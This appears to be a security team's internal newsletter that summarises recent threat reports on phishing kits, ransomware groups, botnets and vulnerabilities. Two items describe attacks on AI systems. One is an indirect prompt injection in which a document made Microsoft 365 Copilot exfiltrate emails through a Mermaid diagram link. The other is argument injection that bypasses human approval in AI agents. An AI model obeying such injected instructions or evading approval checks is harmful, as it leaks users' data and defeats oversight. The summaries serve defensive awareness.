This is a newsletter I create and share with my internal security team. Feel free to grab and do the same.
Impact Solutions: The Point-and-Click Toolkit Democratizing Malware Delivery
A newly observed phishing toolkit—Impact Solutions—provides a user-friendly, point-and-click interface that lets low-skill threat actors generate weaponized attachments (e.g., .lnk shortcuts, HTML smuggling files, malicious SVGs) and staged payloads. The kit emphasizes social-engineering effectiveness (icon spoofing, decoy documents, Cloudflare-style verification prompts) and includes UAC bypasses, sandbox checks, and techniques intended to evade SmartScreen and many antivirus solutions.
Key Insights
Low skill, high impact: The toolkit produces ready-to-send malicious artifacts (shortcut builders, HTML smuggling templates, SVG payloads) that remove the need for malware development expertise.
Social-engineering first: Files are crafted to look legitimate (PDF icons, real-looking invoices, faux verification pages) and often present decoy documents while executing payloads in the background.
Evasion features: Built-in UAC bypass attempts, anti-VM/sandbox checks, AppData execution, and claims to bypass SmartScreen and common AV detection.
ClickFix-style and staged attacks: Some templates instruct users to paste Win+R commands or open local file paths, enabling ClickFix-style execution flows and multi-stage downloads.
Defender opportunity: Behavioral and contextual email analysis (rather than signature matching) is more effective at detecting these campaigns, since the artifacts intentionally evade static detection.
Further Reading: Abnormal AI – Impact Solutions: The Point-and-Click Toolkit Democratizing Malware Delivery
Massive Surge in Scans Targeting Palo Alto Networks Login Portals
BleepingComputer has observed a significant spike in reconnaissance activity against Palo Alto Networks devices. Thousands of hosts globally are probing PAN-OS management or login endpoints (ports 443, 7239, 7777) in just a short timeframe. This wave of scanning appears preliminary—likely mapping vulnerable or misconfigured devices for potential follow-on attacks, such as exploitation, credential stuffing, or proxy pivoting.
Key Insights
Scans primarily target authentication portals for PAN-OS and administrative web UIs (e.g. ports 443, 7239, 7777).
Most scanning traffic originates from distributed IP pools, indicating broad reconnaissance campaigns rather than focused attacks.
Such scanning often precedes attacks like SSRF, zero-day exploits, credential brokering, or lateral pivots through exposed devices.
Organizations should monitor unusual traffic to management endpoints and verify that PAN device interfaces are properly firewalled and accessible only to trusted networks.
Further Reading: Bleeping Computer – Massive Surge in Scans Targeting Palo Alto Networks Login Portals
ShinyHunters (UNC6040) Launches Corporate Extortion Blitz
The ShinyHunters group, operating under aliases like Scattered LAPSUS$ Hunters and associated with threat cluster UNC6040, has initiated a broad extortion campaign threatening dozens of Fortune 500 companies. The group claims to have stolen sensitive Salesforce data through voice-phishing, along with terabytes of consulting/project files from Red Hat and token access data from Salesloft. They are demanding ransom under threat of public data release.
Key Insights
Theft method: voice phishing was used to trick organizations into granting access to Salesforce; stolen data includes authentication tokens and customer records.
Victim profile: major companies such as Toyota, FedEx, Disney/Hulu, UPS, Red Hat, and others are alleged victims.
Extortion tactics: the group has published a “victim shaming” blog demanding ransom, threatening to leak data otherwise; claims to have compromised large volumes of configuration, consulting, and secret infrastructure elements.
Malware and targeting: They use malicious message attachments disguised as screensavers (.scr/.news-style), distributed via phishing; payloads include backdoors (e.g. ASYNCRAT) with capabilities like file exfiltration, keylogging, screenshot capture, etc.
Legal and law-enforcement response: Some members are already indicted or convicted; companies such as Salesforce publicly refuse to negotiate with ransom demands, emphasizing forensic analysis and regulatory contact.
Further Reading: Krebs on Security – ShinyHunters Wage Broad Corporate Extortion Spree
ClickFix Generator: New Automated Toolkit Enables Mass Social Engineering Attacks
Unit 42 has discovered a first-of-its-kind ClickFix Generator toolkit that enables threat actors to automate the creation of ClickFix-style phishing campaigns at scale. The generator crafts prompt texts, social engineering flows, and malicious payloads, allowing adversaries to produce campaign modules in a matter of minutes instead of hours. Early usage traces suggest the tool is already active in the wild, deployed in multiple targeted phishing campaigns.
Key Insights
Quick campaign assembly: With ClickFix Generator, attackers can build full campaigns (lures, messaging flow, payload delivery) rapidly.
Template-based operations: The toolkit comes with prebuilt templates for lures (e.g., “Update Required,” “Verification Needed”) and payload strategies.
Operational reuse: Once built, modules can be re-used or tweaked across multiple campaigns to reduce development overhead.
Detection challenges: Automated tooling increases the volume and diversity of campaigns, making static signatures less effective; defenders must rely more on flow behavior analytics and anomaly detection.
Further Reading: Unit 42 – ClickFix Generator: First-of-Its-Kind Automated Toolkit Observed in the Wild
Employees Sharing Company Secrets with ChatGPT: Rising AI Data-Leak Risk
New research shows a worrying trend: about 77% of enterprise employees regularly paste sensitive corporate data into generative AI tools like ChatGPT. Even more concerning, around 82% of those interactions come from unmanaged personal accounts, putting oversight, compliance, and data protection at risk. The study also flagged that 40% of files uploaded to these tools contain sensitive info like payment data, and 22% of pasted content includes regulated or proprietary information.
Key Insights
Using personal accounts to access AI tools creates blind spots for corporate IT and security teams.
Routine copying and pasting of internal data into AI tools bypasses traditional data loss prevention tools.
Sensitive data exposure isn’t limited to large uploads—small text snippets can still cause regulatory or competitive harm.
Employee training and strict AI usage policies are essential to protect company data.
Further Reading: Cyber Security News – “Employees Share Company Secrets on ChatGPT”
Upcoming Changes to Internet Explorer Mode in Microsoft Edge
Microsoft is updating how Internet Explorer Mode (IE Mode) works in Edge, with implications for compatibility, policy enforcement, and legacy application support. These changes impact how organizations manage legacy web apps relying on the IE11 engine via Edge’s integrated mode.
Key Insights
IE Mode enables legacy IE11 rendering (Trident/MSHTML engine) within Edge for compatibility with older intranet sites and applications.
Only sites explicitly configured (via Enterprise Mode Site List or Group Policy) will load in IE Mode; others default to modern rendering.
Upcoming updates may restrict or alter certain IE Mode behaviors—affecting ActiveX, legacy scripting, user agent emulation, or navigation fallback logic.
Organizations should audit and catalog legacy Web apps now to ensure a smooth transition before changes take effect.
Further Reading: Microsoft – Changes to Internet Explorer Mode in Microsoft Edge
100,000+ IP Botnet Launches Coordinated RDP Attack Wave
GreyNoise observed a coordinated botnet operation (started Oct 8, 2025) involving over 100,000 unique IPs from 100+ countries targeting U.S. Remote Desktop Protocol (RDP) infrastructure using RD Web Access timing attacks and RDP web-client login enumeration.
Key Insights
Mass scale & coordination: The activity involves over 100,000 IPs that share a similar TCP fingerprint, indicating centralized control.
Primary vectors: Operators leveraged RD Web Access timing attacks and RDP Web Client login enumeration to probe and enumerate targets.
Geographic distribution: Source IPs originated from 100+ countries, but attacks were concentrated on U.S. RDP infrastructure.
High-confidence botnet assessment: GreyNoise attributes this as a single multi-country botnet campaign rather than unrelated scanners.
Further Reading: GreyNoise – 100,000+ IP Botnet Launches Coordinated RDP Attack Wave
7-Zip Vulnerabilities: Code Execution, MoTW Bypass & RAR5 Crashes
Several significant vulnerabilities in 7-Zip (versions prior to 24.07 / 24.09 / 25.00 depending on the issue) have been discovered and/or exploited. These flaws allow attackers to bypass Windows’ “Mark-of-the-Web” protections, execute arbitrary code via crafted archives, or crash systems using malicious RAR5 files.
Key Insights
A critical vulnerability (CVE-2025-0411) lets nested archives bypass MoTW protections, enabling malware delivery without triggering usual warnings.
Another high-severity bug in the Zstandard decompression module enables remote code execution in affected versions before 24.07.
RAR5 decoder vulnerability (CVE-2025-53816) allows denial-of-service conditions via malicious RAR5 archives in versions before 25.00.
Version 25.00 (and 25.01 for some symbolic link flaws) includes fixes; users must update manually since 7-Zip lacks automatic update features.
Further Reading: CyberNews – 7-Zip Vulnerabilities
Espionage Exposed: North Korean Remote Worker Network
KELA’s investigation has uncovered thousands of North Korean operatives using fabricated identities and AI-assisted tools to land remote jobs in design, engineering, IT, and architecture. Their employment is a dual-purpose strategy: generate revenue for the regime and gain access to sensitive data, proprietary designs, or system access from within organizations.
Key Insights
Operatives use AI-generated headshots, edited identification, and falsified backgrounds to pass hiring checks.
Target roles span technical and creative fields—beyond just software development.
Evidence links some accounts to infostealer logs and developer-level system access.
Detection patterns include reused passwords, temporary email domains, and unusually polished portfolios for new accounts.
Further Reading: KELA – Espionage Exposed: Inside a North Korean Remote Worker Network
Healthcare Ransomware Roundup: Q1–Q3 2025
According to Comparitech’s 2025 report, ransomware and data breaches in healthcare have continued their alarming trend. The first three quarters saw more than 350 publicly disclosed attacks, resulting in over 140 million records impacted and ransom demands totaling over $350 million. The report highlights the prevalence of vulnerabilities, misconfigurations, and operational dependencies that make healthcare systems a persistent target.
Key Insights
Healthcare organizations face especially high ransomware pressure, given the value and sensitivity of patient data.
Large-scale attacks disproportionately impact smaller entities, which lack mature cyber resilience strategies.
Ransom demand sizes continue to escalate—multiple cases exceeded $10 million.
Attack vectors remain consistent: phishing, unpatched systems, remote desktop exploits, and misconfigured cloud services.
Further Reading: Comparitech – Healthcare Ransomware Roundup Q1–Q3 2025
Tracking ClickFix Infrastructure (AITMFeed / Lab539)
Security analysts have begun mapping core infrastructure used to support ClickFix campaigns, consolidating domain, redirect, and payload delivery patterns. The reconstruction aids defenders in identifying malicious modules tied to active campaigns.
Key Insights
Infrastructure layering: Redirect chains often pass through multiple affiliate or proxy domains before landing on ClickFix lures.
Template reuse: Several ClickFix landing pages share structural and domain-naming patterns—indicating reuse by operators or shared kits.
Payload hosting nodes: Final payload domains are typically short-lived or dynamically rotated, complicating static blocklists.
Early indicators: Identified domains and redirect paths can serve as hunting indicators to uncover emerging ClickFix campaigns before payload execution.
Further Reading: AITMFeed – Tracking ClickFix Infrastructure
Record DDoS Botnet Targets U.S. ISPs (Krebs on Security)
The Aisuru botnet, powered by hundreds of thousands of infected IoT devices, launched a record-breaking DDoS attack peaking at nearly 30 Tbps—impacting major U.S. ISPs such as AT&T, Comcast, and Verizon. Most compromised devices included routers and cameras running outdated firmware or default credentials.
Key Insights
IoT exploitation: Aisuru spreads by scanning for unsecured consumer devices with weak or factory passwords.
Massive impact: Outbound attack traffic from U.S. networks degraded ISP and customer performance.
Mirai lineage: Built from the leaked Mirai code, Aisuru now dominates global IoT botnet activity.
Shared responsibility: ISPs and users must ensure devices are updated and secured to prevent botnet recruitment.
Further Reading: Krebs on Security – DDoS Botnet Aisuru Blankets US ISPs in Record DDoS
Stealthy Phishing Kit Targets Microsoft 365 Users (Barracuda)
Barracuda researchers identified a new phishing kit, dubbed Whisper 2FA, designed to steal Microsoft 365 credentials and bypass multi-factor authentication. The kit operates in real time, capturing both login and MFA tokens through background scripts that validate credentials with attacker-controlled servers.
Key Insights
Real-time MFA capture: Uses live AJAX loops to exfiltrate credentials and prompt victims until valid MFA tokens are obtained.
Anti-analysis techniques: Employs multiple layers of encoding, disables developer tools, and crashes browser inspection to avoid detection.
Rapid adoption: Nearly one million attack attempts observed in a month, placing Whisper 2FA among the top three phishing kits globally.
Kit evolution: Newer versions add stronger obfuscation and broader MFA method support, signaling active development and threat scalability.
Further Reading: Barracuda – Threat Spotlight: Stealthy Phishing Kit Targets Microsoft 365
PhantomVAI Loader Delivers Infostealers in Targeted Attacks
Researchers at Palo Alto Networks’ Unit 42 have identified a new malware loader named PhantomVAI, which is being used to deliver well-known information stealers such as LummaC2 and Rhadamanthys. The loader uses deceptive Microsoft OneDrive-themed lures and employs advanced evasion tactics to bypass traditional security tools.
Key Insights
PhantomVAI leverages phishing campaigns to distribute malicious payloads disguised as OneDrive documents.
The loader uses multilayered obfuscation and anti-analysis techniques to avoid detection.
Once executed, it deploys info-stealing malware that exfiltrates sensitive data, including credentials and browser information.
Its modular design allows threat actors to easily update and customize the loader for different payloads or delivery methods.
Further Reading: Unit42 – PhantomVAI Loader Delivers Infostealers
Non-Web Protocols: The Hidden Attack Surface (Zscaler ThreatLabz)
Zscaler’s ThreatLabz team reports that attackers are increasingly leveraging non-web protocols—such as DNS, RDP, and SMB—to evade detection and exploit enterprise environments. The findings show that a significant share of modern intrusions now occur outside traditional web traffic channels.
Key Insights
DNS abuse dominates: DNS-based tunneling, dynamic updates, and domain generation algorithms account for nearly 84% of non-web protocol attacks.
Brute-force activity surging: RDP represents over 90% of brute-force incidents, while SMB remains a key vector for lateral movement and ransomware propagation.
Retail and energy sectors hit hardest: Retail accounted for 62% of observed attacks, followed by energy and manufacturing industries where legacy systems persist.
Legacy protocols exploited: Long-trusted protocols like SMBv1 and RDP continue to be weaponized for access, persistence, and data exfiltration.
Further Reading: Zscaler – Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface
Scattered LAPSUS$ Hunters Shift Tactics Toward EaaS & Insider Recruitment (Unit 42 / Palo Alto Networks)
Unit 42 reports that the cybercriminal group Scattered LAPSUS$ Hunters—known for major extortion operations—is evolving its approach. The group appears to be transitioning toward an Extortion-as-a-Service (EaaS) model while recruiting insiders and experimenting with new ransomware capabilities.
Key Insights
Extortion-as-a-Service model: The group is offering affiliates the ability to run extortion campaigns without relying on traditional ransomware encryption.
Insider recruitment drive: Members are openly seeking employees within telecom, gaming, SaaS, and hosting companies across several Western countries.
Data leak activity: Following a public deadline, the group released data allegedly tied to multiple aviation, energy, and retail organizations.
New ransomware development: References to a tool dubbed “SHINYSP1D3R” suggest potential expansion into full ransomware operations.
Broader targeting: Beyond major tech platforms, the group’s focus now spans hospitality, retail, and loyalty program data.
Further Reading: Unit 42 – Scattered LAPSUS$ Hunters Signal Shift in Tactics
Tykit: New Phishing Kit Stealing Hundreds of Microsoft Accounts in Finance (ANY.RUN)
Researchers at ANY.RUN have identified a new phishing kit framework, dubbed Tykit, that targets Microsoft 365 credentials across financial and corporate sectors. The kit demonstrates organized Phishing-as-a-Service (PhaaS) characteristics, allowing widespread deployment and efficient credential harvesting.
Key Insights
Broad targeting: Active since May 2025, Tykit campaigns have primarily targeted finance, construction, IT, and professional services organizations.
Layered delivery chain: Attacks begin with an SVG image embedding encoded JavaScript that redirects victims to fake Microsoft 365 login pages.
Credential exfiltration: After submission, stolen data is transmitted through encrypted POST requests to attacker-controlled command-and-control endpoints.
Evasion and MFA bypass: The kit detects analysis tools, restricts developer console access, and supports methods to bypass two-factor authentication.
Commercial reuse: Numerous samples share nearly identical domain patterns and code structures, indicating large-scale kit distribution.
Further Reading: ANY.RUN – Tykit Technical Analysis
Microsoft 365 Copilot — Arbitrary Data Exfiltration via Mermaid Diagrams (Adam Logue)
Adam Logue demonstrated an indirect prompt-injection technique against Microsoft 365 Copilot where a specially crafted Office document caused Copilot to fetch sensitive tenant data (e.g., recent emails), hex-encode it, and embed that encoded data into a generated Mermaid diagram. The diagram contained a clickable “login” artifact whose link pointed to an attacker server with the hex data in the URL; when activated the data was exfiltrated. Microsoft has since patched the issue by removing interactive/dynamic hyperlink behavior from Mermaid diagrams in Copilot.
Key Insights
Indirect prompt injection + rendering chain: The attack chained prompt injection (hidden instructions in document sheets) with Copilot’s ability to call enterprise search tools and then render outputs into Mermaid.
Mermaid as an exfil channel: Mermaid diagrams support CSS/hyperlink features that can be abused to place large, encoded payloads (hex strings) into clickable artifacts.
Encoded-data transport: Exfiltration relied on Copilot hex-encoding fetched data and embedding it in a URL — simple to decode from server logs once received.
Click vs zero-click nuance: Adam’s PoC required a click to transmit the data, but related research (e.g., Cursor IDE) shows remote rendering can enable zero-click variants — increasing risk where renderers auto-fetch remote content.
Patch validated: Microsoft removed interactive/dynamic hyperlink behavior in Mermaid renders for Copilot, mitigating the specific vector; defenders should still treat diagram rendering and LLM tool integrations as risky.
Further Reading: Adam Logue – Microsoft 365 Copilot: Arbitrary Data Exfiltration Via Mermaid Diagrams
Beyond Credentials: Weaponizing OAuth Applications for Persistent Cloud Access (Proofpoint)
Proofpoint researchers show how attackers are increasingly abusing OAuth applications to gain resilient, long-lived access inside compromised cloud environments. After an initial account takeover, adversaries can create or authorize internal OAuth apps with broad API scopes — allowing data access and command-and-control that survives password resets and MFA unless the malicious app is explicitly revoked.
Key Insights
Persistence beyond credentials: Malicious OAuth apps retain authorized access even after victims change passwords or enable MFA, creating durable backdoors.
Automatable attack flow: Proofpoint developed a proof-of-concept and tooling that demonstrate how attackers can fully automate app creation, permission assignment, and authorization.
Internal app abuse: Attackers leverage the ability to register or authorize internal (second-party) applications with custom scopes to read mailboxes, files, and other sensitive cloud resources.
Long-lived tokens & stealth: Tokens and app permissions can remain valid for extended periods (months to years) and are often overlooked by standard account-centric detections.
Detection gaps: Traditional defenses focused on credentials (password resets, MFA) are insufficient; defenders need app-centric telemetry and regular permission audits.
Further Reading: Proofpoint – Beyond Credentials: Weaponizing OAuth Applications for Persistent Cloud Access
Prompt Injection to RCE in AI Agents (Trail of Bits)
Trail of Bits demonstrates that argument-injection flaws in agent platforms can bypass “human approval” protections and lead to remote code execution (RCE). By exploiting pre-approved system commands whose arguments aren’t properly sanitized or separated, researchers achieved RCE across multiple popular agent implementations and propose design changes—like sandboxing and strict argument handling—to reduce the risk.
Key Insights
Approved-command attack surface: Allowlisting commands (e.g., find, git, rg) while failing to validate or safely separate arguments creates a powerful injection vector.
Argument injection practicalities: Attackers can craft arguments that append or alter behavior of pre-approved commands (e.g., via special characters, facet patterns or malformed flags) to escalate to arbitrary execution.
Human-approval bypass: Workflows that auto-execute “safe” commands without robust argument checks let adversaries bypass intended human-in-the-loop controls.
Cross-platform prevalence: Trail of Bits reproduced the class of vulnerability across three different agent platforms, suggesting the issue is a common design antipattern.
Evasion & usability tradeoffs: Naïve blocking of arguments breaks legitimate functionality; secure designs require careful argument modeling or safer alternatives (e.g., dedicated APIs).
Mitigations recommended: Use sandboxed execution, strong argument separation/parsing, avoid facade patterns that accept raw argument strings, and log/monitor command invocations for anomalous parameters.
Further Reading: Trail of Bits – Prompt injection to RCE in AI agents
Global Smishing Campaign Targets Mobile Users (Unit 42 / Palo Alto Networks)
A large-scale smishing (SMS phishing) campaign has been identified by Unit 42, targeting mobile users across multiple regions. Attackers are exploiting promotional hooks and limited oversight on mobile endpoints to deliver malicious links and credential-harvesting portals.
Key Insights
Many messages impersonate banks, logistics firms, or retail brands and include URLs leading to credential-stealing sites or malicious apps.
The campaign spans numerous countries and uses localized language and brand cues to increase trust and response rates.
Because mobile devices often lack the endpoint protections found on desktops, the campaign leverages the low visibility of mobile threats to evade detection.
Tactics include use of short-link services, dynamic domains, and rapid rotation of landing pages to defeat static blocklists.
Further Reading: Unit 42
Devman’s RaaS Launch: The Affiliate Who Aims to Become the Boss (Analyst1)
Research by Analyst1 reveals how a ransomware affiliate known as Devman evolved from working under major cybercrime groups to launching his own Ransomware-as-a-Service (RaaS) platform in late 2025. The report highlights his shift from affiliate to operator, his use of the leaked DragonForce code, infrastructure consolidation, and efforts to recruit new affiliates.
Key Insights
Affiliate turned service operator: Devman transitioned from a high-performing affiliate to creating his own RaaS offering.
Capital investment signals seriousness: He actively purchased initial access in Western countries and built a dedicated leak site with high ransom demands.
Leveraging leaked code & bugs: His ransomware variant reused DragonForce/Conti code, showing both operational maturity and technical flaws.
Recruitment & platform launch: The RaaS platform went live in late September 2025, featuring affiliate recruitment messaging and new infrastructure.
Branding and self-promotion: Devman’s public persona projects a “gangster-entrepreneur” image, reflecting how ransomware operators blend crime with marketing.
Further Reading: Analyst1
Insider Threats Loom While Ransom Payment Rates Plummet (Coveware)
Coveware’s latest report reveals that despite a sharp decline in ransom payments in Q3 2025, insider-caused incidents are growing in significance. Although organizations are less frequently paying ransoms, internal misuse, negligence, and compromised credentials by insiders are becoming key contributors to successful breaches.
Key Insights
Ransom payment decline: Payment rates have fallen substantially, suggesting organizations are shifting to alternative recovery approaches.
Insider risk rise: The proportion of incidents involving insiders—whether malicious, negligent, or compromised—has increased notably.
Less money, more tactics: While the ransom amounts may drop, attackers are still achieving impact through stolen credentials, insider access, or supply-chain leverage.
Mitigation gap: Many organisations focused on external threat vectors but lack rigorous controls for internal access monitoring, exit protocols, and third-party liaison.
Further Reading: Coveware – Insider Threats Loom While Ransom Payment Rates Plummet
Catching Credential Guard Off-Guard (SpecterOps)
SpecterOps researchers have detailed new techniques that undermine Windows Credential Guard, a key defensive feature meant to isolate and protect user credentials. The findings demonstrate how attackers with elevated privileges can bypass Credential Guard to extract sensitive authentication data, even in systems considered fully protected.
Key Insights
Bypass through privilege misuse: Attackers can exploit accounts with specific service permissions to sidestep Credential Guard’s memory isolation.
In-memory data extraction: New tools enable credential dumping directly from protected memory regions, exposing NTLM hashes and LSA secrets.
Detection blind spots: Many defenders rely on Credential Guard as a standalone safeguard; this research highlights the need for behavioral detection and anomaly monitoring.
Lateral movement risk: Compromised credentials obtained through these methods allow stealthier privilege escalation and movement within the network.
Further Reading: SpecterOps
LockBit Returns — and It Already Has Victims (Check Point Research)
The ransomware group LockBit, previously disrupted in early 2024, has re-emerged under a new variant known as LockBit 5.0 (ChuongDong). Check Point Research confirmed new attacks spanning Windows, Linux, and ESXi systems across multiple regions, signaling a full return of one of the most prolific Ransomware-as-a-Service (RaaS) operations.
Key Insights
Affiliate recruitment resumes: LockBit is again advertising in underground forums, rebuilding its affiliate ecosystem.
Expanded platform targeting: The updated variant includes support for Windows, Linux, and ESXi environments.
Enhanced capabilities: Faster encryption and new evasion methods improve operational efficiency for attackers.
Global victim impact: Confirmed incidents across multiple continents indicate the group’s infrastructure is fully operational again.
RaaS resilience: Despite past takedowns, the LockBit model demonstrates the durability of ransomware service ecosystems.
Further Reading: Check Point Research
The YouTube Ghost Network (Unmasked – Check Point Research)
Researchers at Check Point Research uncovered a large-scale malware-distribution operation on YouTube — dubbed the YouTube Ghost Network — which used compromised and fake channels to post over 3,000 videos offering game cheats and cracked software, but in fact delivering infostealers like Rhadamanthys and Lumma Stealer. Those videos amassed hundreds of thousands of views and were deliberately boosted with fake likes and comments to create trust. The network mapped multiple account-roles (video-uploads, community posts, interaction bots) and showed how malware actors are abusing platform trust and engagement tools to run self-infection traps at scale.
Key Insights
Role-based account structure: The network divided labor across accounts: content uploaders, engagement bots, and link/post sharers — enabling resilience even when channels were banned.
High-engagement deception: Some videos had hundreds of thousands of views and positive comment streams, increasing perceived legitimacy.
Infostealer distribution via “free” software lure: The campaigns baited users with cracked software or game hacks, directing them to archives hiding infostealers.
Massive scale and rapid growth: Over 3,000 malicious videos were identified, with 2025 upload volume tripling from prior years.
Platform-trust exploitation: Attackers leveraged YouTube’s social features to amplify reach and bypass traditional detection systems.
Further Reading: Check Point Research
Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited (Unit 42 / Palo Alto Networks)
A critical vulnerability in the Windows Server Update Services (WSUS) role—tracked as CVE-2025-59287—allows unauthenticated remote code execution (RCE) on Windows servers where WSUS is enabled. Researchers observed active exploitation following Microsoft’s emergency patch, making this a high-priority threat for enterprises.
Key Insights
Unauthenticated system-level access: Attackers exploiting the vulnerability can execute arbitrary code as SYSTEM on affected WSUS servers.
Wide exposure: Thousands of publicly exposed WSUS instances were detected, broadening the potential attack surface.
Rapid post-patch exploitation: Exploitation began shortly after an out-of-band update and the vulnerability was added to the U.S. known-exploited vulnerabilities catalog.
Reconnaissance & exfiltration patterns: Observed attack chains include WSUS service processes spawning shells that gather domain data and exfiltrate via webhooks.
Preventable risk exposure: WSUS should never be Internet-facing; failing to block default WSUS ports or disable unused roles significantly increases risk.
Further Reading: Unit 42
New Phishing Attack Uses Invisible Characters to Evade Filters (Cybersecurity News)
Security researchers have observed a campaign that embeds invisible Unicode characters (zero-width and similar) into email subjects and URLs to evade keyword-based filters and URL reputation checks. The technique breaks up recognisable words and link patterns so automated scanners miss them while email clients render the content normally for users — increasing click-through risk and lowering detection rates.
Key Insights
Invisible-character obfuscation: Attackers insert zero-width spaces, soft hyphens, and other invisible Unicode characters into subject lines and URLs to defeat pattern-matching and reputation checks.
MIME/encoding abuse: Malicious emails use MIME tricks and encoded attachments (SVGs, HTML) to hide payloads and redirect chains from straightforward inspection.
SafeLinks & gateway bypasses: The obfuscation can break or bypass URL-rewriting and safe-link protections, causing scanners to misclassify or truncate suspicious links.
User-facing normalcy: Message lists may display garbled or incomplete subjects while the opened email shows a readable, convincing lure — increasing the chance a recipient will engage.
Hunting signals: Look for unusually high counts of zero-width/unicode characters in subjects/URLs, mismatched subject rendering between list view and message view, and abnormal redirect chains from SVG/HTML attachments.
Further Reading: Cybersecurity News
Exploiting Trust in Collaboration: Microsoft Teams Vulnerabilities Uncovered (Check Point Research)
Check Point Research found multiple vulnerabilities in Microsoft Teams that let attackers manipulate conversations and notifications to impersonate colleagues, alter message content silently, and forge caller identities. The flaws exploit trust built into collaboration features—such as message identifiers, conversation topics, and call initiation fields—allowing attackers to mislead recipients without obvious signs of tampering.
Key Insights
Invisible message edits: Attackers can rewrite previously sent messages without triggering the “Edited” label, undermining the integrity of chat history.
Spoofed notifications: Notification fields can be manipulated so alerts appear to originate from trusted executives or colleagues.
Display-name manipulation: Conversation topics in private chats can be changed to alter displayed participant names, misleading recipients about who they’re speaking with.
Forged caller identity: Call initiation fields can be abused to present arbitrary names during audio/video calls, enabling convincing impersonation.
Platform-trust attack surface: Collaboration apps’ built-in trust signals (notifications, display names, edit markers) can be weaponized to bypass user assumptions and social-engineering defenses.
Further Reading: Check Point Research
Phishing Campaign Abuses Cloudflare Services (Cyber Security News)
A new large-scale phishing campaign has been discovered exploiting the infrastructure of Cloudflare Pages and ZenDesk to host malicious login portals, leveraging trusted cloud platforms to evade detection and harvest credentials. Over 600 malicious *.pages.dev domains were involved, using typosquatting of support portals and live chat operators to further trick victims. Cyber Security News
Key Insights
Trusted-platform exploitation: Attackers register domains under *.pages.dev (Cloudflare Pages) and use Zendesk hubs to make pages appear legitimate, thereby defeating reputation-based defenses.
Mass-scale credential harvest: More than 600 malicious domains were identified in the campaign, showing rapid registration and deployment of phishing infrastructure.
Live-chat assault vector: In some cases, human operators engaged victims via embedded chat interfaces, requesting phone numbers and convincing them to install remote tools under the guise of “support.”
Technical advance in delivery: The attackers used Google Site Verification and Microsoft Bing Webmaster tokens to validate fake pages and improve its search legitimacy and SSO poisoning potential.
Multi-vector exit stratagem: Beyond credential theft, the campaign steered victims to install legitimate remote-monitoring tools repurposed for malicious access, increasing post-compromise risk.
Further Reading: Cyber Security News
